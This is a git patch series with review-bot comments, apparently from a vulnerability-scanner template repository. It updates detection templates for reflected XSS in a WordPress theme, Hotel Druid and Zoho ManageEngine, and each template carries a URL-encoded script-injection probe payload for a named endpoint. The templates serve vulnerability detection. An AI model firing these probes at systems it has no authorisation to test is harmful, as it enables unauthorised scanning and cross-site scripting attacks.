17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:51:39 +0530 Subject: [PATCH 334/339] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index ddd8a322ce..98f6fd96aa 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml 
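Review bot: The new `options=` value drops the `%27%2C%27` (`','`) separator the old value kept between the payload and `custom_name`: it now decodes to `'forecast_days':'5</script><script>…</script>custom_name':'Cairo'` instead of `'forecast_days':'5…','custom_name':'Cairo'`, so the structure handed to `tie_get_user_weather` differs from the referenced PoC and, if the handler parses `options` before echoing, the reflection may change or vanish. Restoring `%3C%2Fscript%3E%27%2C%27custom_name` keeps the PoC shape. The `status:` value is outside the hunk.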
@@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - tags: cves,cve2021,wordpress,xss,wp-theme + tags: cve,cve2021,wordpress,xss,wp-theme requests: - raw: From 1ba6b92a13a5e09e674f4adacd9462b12b4ea491 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:58:05 +0530 Subject: [PATCH 335/339] Update CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index da7b18b64c..4b98f8b51a 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml 
@@ -4,32 +4,33 @@ info: name: Hotel Druid 3.0.2 XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - tags: cves,cve2021,hotel-druid,xss + tags: cve,cve2021,hoteldruid,xss requests: - method: GET path: - - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' - - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' - - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' - - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' + - 
'{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 9b31b064938690456cb7f5f91c13104d3a0334bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:29:49 +0000 Subject: [PATCH 336/339] Auto Generated CVE annotations [Thu Sep 16 17:29:49 UTC 2021] :robot: --- cves/2021/CVE-2021-24364.yaml | 5 +++++ cves/2021/CVE-2021-24407.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index b4f2434d35..61d31c4a48 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24364 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 98f6fd96aa..6a5f152f5c 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml 
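Review bot: The fourth path (`crea_modelli.php`) submits database-connection settings (`T_PHPR_DB_TYPE`, `T_PHPR_DB_HOST`, `T_PHPR_DB_USER`, `T_PHPR_DB_PASS`) together with `form_availability_calendar_template=1`, which, unlike the three `visualizza_tabelle`/`storia_soldi`/`tabella` probes, looks like a write or configuration action rather than a pure read, and nothing in the template records that it was confirmed side-effect free on a live install. The newly added `stop-at-first-match: true` means it only fires when the first three miss, which limits the blast radius, but that ordering dependency is implicit; make it explicit with a comment above the path list such as `# crea_modelli.php probe carries DB/template params — kept last on purpose; confirm it is read-only before broad scans`. Swapping the `"` attribute break-out for `</script><script>…` still matches the body literal when the reflection sits inside an attribute, so the check now detects unescaped reflection rather than proven execution, which is worth a word in the description.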
@@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24407 + cwe-id: CWE-79 requests: - raw: From 0c18bafa42a419297226381af15e1a7373d7b715 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:31:46 +0000 Subject: [PATCH 337/339] Auto Generated CVE annotations [Thu Sep 16 17:31:46 UTC 2021] :robot: --- cves/2021/CVE-2021-37833.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index 4b98f8b51a..74f7def049 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -9,6 +9,11 @@ info: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 tags: cve,cve2021,hoteldruid,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37833 + cwe-id: CWE-79 requests: - method: GET From 631005ebaa31f2fad8463f6bf299c3975f0b390b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 23:03:45 +0530 Subject: [PATCH 338/339] Update CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index fdc71f0e37..234ee0dcdd 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml 
@@ -7,23 +7,21 @@ info: description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - tags: cves,cve2018,zoho,xss + - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 + tags: cve,cve2018,zoho,xss requests: - method: GET path: - - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111" - headers: - Content-Type: application/x-www-form-urlencoded + - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - "" part: body - type: status @@ -31,6 +29,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From fdc98d1405717662a4a0a4cb027aa9d8b666ef17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:39:06 +0000 Subject: [PATCH 339/339] Auto Generated CVE annotations [Thu Sep 16 17:39:06 UTC 2021] :robot: --- cves/2018/CVE-2018-12998.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 234ee0dcdd..276fbcff83 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml 
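Review bot: The `type: status` matcher is left sandwiched between the body and header word matchers (the second hunk only reorders `part:`/`words:`), whereas the sibling templates touched in this same series (CVE-2021-24364, CVE-2021-24407, CVE-2021-37833) put `status` last; moving the three `- type: status` / `status:` / `- 200` lines to the end keeps the matcher block shape uniform across the repo. Dropping the `Content-Type: application/x-www-form-urlencoded` header on a GET is the right call. The description in the context lines still begins lowercase (`reflected Cross-site scripting`) while this series capitalised the Hotel Druid one; `Reflected cross-site scripting (XSS) …` would be consistent. The remainder of the `requests:` item lies outside the hunk.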
@@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 tags: cve,cve2018,zoho,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-12998 + cwe-id: CWE-79 requests: - method: GET